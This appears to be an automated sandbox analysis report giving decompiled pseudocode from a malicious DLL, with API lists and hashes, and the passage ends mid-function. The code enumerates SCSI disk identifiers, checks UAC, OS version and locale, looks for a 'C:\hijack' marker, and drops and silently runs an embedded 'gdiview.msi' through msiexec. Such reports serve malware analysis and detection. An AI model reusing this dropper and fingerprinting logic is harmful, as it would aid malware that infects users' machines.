                                                                                                                                                                  			E1001D5C0(void* __edi, char* _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				struct _OVERLAPPED* _v20;
                                                                                                                                                                  				struct _OVERLAPPED* _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				void* _v32;
                                                                                                                                                                  				short _v548;
                                                                                                                                                                  				char _v1010;
                                                                                                                                                                  				char _v1068;
                                                                                                                                                                  				char _v1070;
                                                                                                                                                                  				intOrPtr _v1084;
                                                                                                                                                                  				intOrPtr _v1092;
                                                                                                                                                                  				intOrPtr _v1096;
                                                                                                                                                                  				intOrPtr _v1100;
                                                                                                                                                                  				intOrPtr _v1104;
                                                                                                                                                                  				void _v1108;
                                                                                                                                                                  				char _v2132;
                                                                                                                                                                  				struct _OVERLAPPED* _v2136;
                                                                                                                                                                  				char _v2137;
                                                                                                                                                                  				long _v2144;
                                                                                                                                                                  				struct _OVERLAPPED* _v2148;
                                                                                                                                                                  				intOrPtr _v2152;
                                                                                                                                                                  				char* _v2156;
                                                                                                                                                                  				void* _t79;
                                                                                                                                                                  				int _t87;
                                                                                                                                                                  				intOrPtr _t91;
                                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                                  				void* _t125;
                                                                                                                                                                  				void* _t126;
                                                                                                                                                                  				void* _t127;
                                                                                                                                                                  
                                                                                                                                                                  				_t125 = __edi;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v2136 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				do {
                                                                                                                                                                  					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                                  					_t127 = _t127 + 0xc;
                                                                                                                                                                  					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                                  					_v32 = _t79;
                                                                                                                                                                  					if(_v32 != 0xffffffff) {
                                                                                                                                                                  						_v12 = 0;
                                                                                                                                                                  						while(1 != 0) {
                                                                                                                                                                  							E1000CF80(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                                  							_t127 = _t127 + 0xc;
                                                                                                                                                                  							_v1104 = 0x49534353;
                                                                                                                                                                  							_v1100 = 0x4b534944;
                                                                                                                                                                  							_v1068 = _v12;
                                                                                                                                                                  							_v1108 = 0x1c;
                                                                                                                                                                  							_v1096 = 0x2710;
                                                                                                                                                                  							_v1084 = 0x211;
                                                                                                                                                                  							_v1092 = 0x1b0501;
                                                                                                                                                                  							_v1070 = 0xec;
                                                                                                                                                                  							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
                                                                                                                                                                  							if(_t87 == 0 || _v1010 == 0) {
                                                                                                                                                                  								L20:
                                                                                                                                                                  								if(_v2136 != 0) {
                                                                                                                                                                  									L23:
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_v12 =  &(_v12->Internal);
                                                                                                                                                                  									if(_v12 < 2) {
                                                                                                                                                                  										goto L23;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										continue;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v16 = 0;
                                                                                                                                                                  								do {
                                                                                                                                                                  									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                                  									_v16 = _v16 + 1;
                                                                                                                                                                  								} while (_v16 < 0x100);
                                                                                                                                                                  								_t91 = E1001CDD0( &_v2132);
                                                                                                                                                                  								_t127 = _t127 + 4;
                                                                                                                                                                  								_v28 = _t91;
                                                                                                                                                                  								_v2148 = 0;
                                                                                                                                                                  								_v8 = 0x104;
                                                                                                                                                                  								_v2156 = _a4;
                                                                                                                                                                  								_v2152 = _v28 - _a4;
                                                                                                                                                                  								while(_v8 != 0x80000106) {
                                                                                                                                                                  									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                                  									if(_v2137 != 0) {
                                                                                                                                                                  										 *_v2156 = _v2137;
                                                                                                                                                                  										_v2156 = _v2156 + 1;
                                                                                                                                                                  										_t96 = _v8 - 1;
                                                                                                                                                                  										_v8 = _t96;
                                                                                                                                                                  										if(_t96 != 0) {
                                                                                                                                                                  											continue;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											L17:
                                                                                                                                                                  											_v2156 = _v2156 - 1;
                                                                                                                                                                  											_v2148 = 0x8007007a;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  									L18:
                                                                                                                                                                  									 *_v2156 = 0;
                                                                                                                                                                  									if(_v2148 < 0) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										goto L24;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L25;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                                                  									goto L17;
                                                                                                                                                                  								} else {
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							L25:
                                                                                                                                                                  							FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                  							_v20 = _v24;
                                                                                                                                                                  							goto L26;
                                                                                                                                                                  						}
                                                                                                                                                                  						L24:
                                                                                                                                                                  						_v2136 = 1;
                                                                                                                                                                  						goto L25;
                                                                                                                                                                  					}
                                                                                                                                                                  					L26:
                                                                                                                                                                  					_v20 =  &(_v20->Internal);
                                                                                                                                                                  					_v24 = _v20;
                                                                                                                                                                  				} while (_v20 < 0x10);
                                                                                                                                                                  				return _v2136;
                                                                                                                                                                  			}


APIs
• wsprintfW.USER32 ref: 1001D5F1
• CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
• _memset.LIBCMT ref: 1001D645
• DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D6C0
• FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D802
Strings
Memory Dump Source
• Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
• Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
• Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
• Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
Similarity
• API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
• String ID: DISK$SCSI$\\.\Scsi%d:$z
• API String ID: 2954624657-153650326
• Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
• Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
• Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
• Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FCD0(void* __edi, void* __eflags) {
                                                                                                                                                                  				char _v1027;
                                                                                                                                                                  				char _v1028;
                                                                                                                                                                  				char _v1291;
                                                                                                                                                                  				char _v1292;
                                                                                                                                                                  				int _t21;
                                                                                                                                                                  				void* _t22;
                                                                                                                                                                  
                                                                                                                                                                  				_t29 = __edi;
                                                                                                                                                                  				_v1292 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v1291, 0, 0x103);
                                                                                                                                                                  				_v1028 = 0;
                                                                                                                                                                  				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
                                                                                                                                                                  				GetTempPathA(0x104,  &_v1292);
                                                                                                                                                                  				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
                                                                                                                                                                  				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
                                                                                                                                                                  				E1001FC70( &_v1292, 0x10027948, 0x39e00); // executed
                                                                                                                                                                  				_t21 = PathFileExistsA( &_v1292); // executed
                                                                                                                                                                  				_t38 = _t21;
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					_t22 = E1001A230(_t38,  &_v1028); // executed
                                                                                                                                                                  					return _t22;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t21;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FCEE
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FD0B
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FD36
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FD51
                                                                                                                                                                    • Part of subcall function 1001FC70: CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                    • Part of subcall function 1001FC70: WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                    • Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD79
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                  • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                  • API String ID: 1459467440-729886463
                                                                                                                                                                  • Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
                                                                                                                                                                  • Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				int _t20;
                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                  				void* _t33;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				intOrPtr _t51;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                                  				intOrPtr _t55;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  
                                                                                                                                                                  				_t62 = __eflags;
                                                                                                                                                                  				_t45 = __esi;
                                                                                                                                                                  				_t44 = __edi;
                                                                                                                                                                  				_t36 = __ebx;
                                                                                                                                                                  				E1001FE40(); // executed
                                                                                                                                                                  				E10020020(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.1", "51.0", "exe"); // executed
                                                                                                                                                                  				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                                  				_t37 = _t51;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                                  				E100202C0(__ebx, __edi, __esi, _t62); // executed
                                                                                                                                                                  				_t52 = _t51 + 0x1c;
                                                                                                                                                                  				_t20 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                                  					L7:
                                                                                                                                                                  					_t53 = _t52 - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                                  					E100202C0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                  					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
                                                                                                                                                                  					E1001FF30(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                  					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
                                                                                                                                                                  					E1001FE50(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                  					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                                  					E100202C0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E1001A100(); // executed
                                                                                                                                                                  					_t33 = E1001A110(_t37); // executed
                                                                                                                                                                  					if(_t33 == 0 || E10019D70() != 0) {
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
                                                                                                                                                                  						_t52 = _t52 + 8;
                                                                                                                                                                  						__eflags = _t35;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							goto L7;
                                                                                                                                                                  						} else {
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				E1001A2C0(); // executed
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t47 - 0x28);
                                                                                                                                                                  				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                                  				return _t31;
                                                                                                                                                                  			}














                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207e1
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x100207f8
                                                                                                                                                                  0x100207ff
                                                                                                                                                                  0x10020804
                                                                                                                                                                  0x10020807
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002080b
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x1002089c
                                                                                                                                                                  0x100208a1
                                                                                                                                                                  0x100208ab
                                                                                                                                                                  0x100208b5
                                                                                                                                                                  0x100208ba
                                                                                                                                                                  0x100208c3
                                                                                                                                                                  0x100208ce

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(C:\hijack), ref: 100207D2
                                                                                                                                                                    • Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                  • String ID: -0.1$51.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                                  • API String ID: 482051434-2164037247
                                                                                                                                                                  • Opcode ID: 0be4b333ec2e3325d289ee9c9b191f0e101dd28759a6e9f942734f1c1f3d775c
                                                                                                                                                                  • Instruction ID: 9599716a8016536e2dc487c9b8d22fe1c18f1641b674e0e16c19d2f9c65c59e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 0be4b333ec2e3325d289ee9c9b191f0e101dd28759a6e9f942734f1c1f3d775c
                                                                                                                                                                  • Instruction Fuzzy Hash: B2018138D04309AED710EBA5AC4A6DD77A3EF51294F9401A9FA0467643EF31A5809AA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                  				struct _OSVERSIONINFOW _v284;
                                                                                                                                                                  				char _v547;
                                                                                                                                                                  				char _v548;
                                                                                                                                                                  				char _v819;
                                                                                                                                                                  				char _v820;
                                                                                                                                                                  				char _v824;
                                                                                                                                                                  				void* _t31;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_t69 = __esi;
                                                                                                                                                                  				_t68 = __edi;
                                                                                                                                                                  				_t57 = __ebx;
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					return _t31;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v820 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v819, 0, 0x103);
                                                                                                                                                                  				_v548 = 0;
                                                                                                                                                                  				_t58 =  &_v547;
                                                                                                                                                                  				E1000CF80(_t68,  &_v547, 0, 0x103);
                                                                                                                                                                  				_t65 =  &(_v284.dwMajorVersion);
                                                                                                                                                                  				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
                                                                                                                                                                  				_t74 = _t71 + 0x24;
                                                                                                                                                                  				_v284.dwOSVersionInfoSize = 0x114;
                                                                                                                                                                  				GetVersionExW( &_v284);
                                                                                                                                                                  				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D2A0() == 0) {
                                                                                                                                                                  					_t38 = E1001D840(_t68,  &_v548); // executed
                                                                                                                                                                  					_t75 = _t74 + 4;
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                                  						L11:
                                                                                                                                                                  						E1001D330(_t58,  &_v548);
                                                                                                                                                                  						_t65 =  &_v820;
                                                                                                                                                                  						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
                                                                                                                                                                  						_t77 = _t75 + 0x10;
                                                                                                                                                                  						__eflags = _t41;
                                                                                                                                                                  						if(_t41 >= 0) {
                                                                                                                                                                  							_t65 = 0x104 - _v824;
                                                                                                                                                                  							__eflags = 0x104;
                                                                                                                                                                  							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
                                                                                                                                                                  							_t77 = _t77 + 0xc;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t49 = E1001D5C0(_t68,  &_v548); // executed
                                                                                                                                                                  					_t75 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t49;
                                                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t58 =  &_v548;
                                                                                                                                                                  					_t50 = E1001DAD0(_t68,  &_v548); // executed
                                                                                                                                                                  					_t75 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t50;
                                                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t65 =  &_v548;
                                                                                                                                                                  					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
                                                                                                                                                                  					_t77 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t51;
                                                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t53 = E1001DAD0(_t68,  &_v548);
                                                                                                                                                                  					_t77 = _t74 + 4;
                                                                                                                                                                  					_t84 = _t53;
                                                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                                                  						_t65 =  &_v548;
                                                                                                                                                                  						E1001D330( &_v548,  &_v548);
                                                                                                                                                                  						E1001D380(_t84,  &_v820,  &_v548);
                                                                                                                                                                  						_t77 = _t77 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					L13:
                                                                                                                                                                  					if(_v820 == 0) {
                                                                                                                                                                  						_t65 =  &_v820;
                                                                                                                                                                  						E1001D000("Mid2Failed", 0x104,  &_v820);
                                                                                                                                                                  						_t77 = _t77 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					return E1000D903(_t65, _a4, 0x104,  &_v820);
                                                                                                                                                                  				}
                                                                                                                                                                  			}























                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ddaa
                                                                                                                                                                  0x1001dd4c
                                                                                                                                                                  0x1001dd51
                                                                                                                                                                  0x1001dd54
                                                                                                                                                                  0x1001dd56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd58
                                                                                                                                                                  0x1001dd5f
                                                                                                                                                                  0x1001dd64
                                                                                                                                                                  0x1001dd67
                                                                                                                                                                  0x1001dd69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd6b
                                                                                                                                                                  0x1001dd72
                                                                                                                                                                  0x1001dd77
                                                                                                                                                                  0x1001dd7a
                                                                                                                                                                  0x1001dd7c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dcf5
                                                                                                                                                                  0x1001dcfc
                                                                                                                                                                  0x1001dd01
                                                                                                                                                                  0x1001dd04
                                                                                                                                                                  0x1001dd06
                                                                                                                                                                  0x1001dd08
                                                                                                                                                                  0x1001dd0f
                                                                                                                                                                  0x1001dd25
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001ddd5
                                                                                                                                                                  0x1001ddde
                                                                                                                                                                  0x1001dde0
                                                                                                                                                                  0x1001ddf1
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001de0e

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                  • GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                    • Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                    • Part of subcall function 1001DAD0: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                    • Part of subcall function 1001DAD0: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                    • Part of subcall function 1001DAD0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14
                                                                                                                                                                    • Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                  • String ID: Mid2Failed
                                                                                                                                                                  • API String ID: 3782552391-1001836097
                                                                                                                                                                  • Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1001FF30(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v311;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v575;
                                                                                                                                                                  				char _v576;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  
                                                                                                                                                                  				_t50 = __eflags;
                                                                                                                                                                  				_t41 = __edi;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100231AF);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t43;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v576 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                  				_v312 = 0;
                                                                                                                                                                  				E1000CF80(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                  				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
                                                                                                                                                                  				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                  				_push(E100011E0( &_a4));
                                                                                                                                                                  				_push("0011");
                                                                                                                                                                  				_push(E100011E0( &_v44));
                                                                                                                                                                  				E1000CCA3(_t41,  &_v312, "%s%s %s %s",  &_v576);
                                                                                                                                                                  				E1001A230(_t50,  &_v312); // executed
                                                                                                                                                                  				E100011A0( &_v44);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				_t30 = E100011A0( &_a4);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t30;
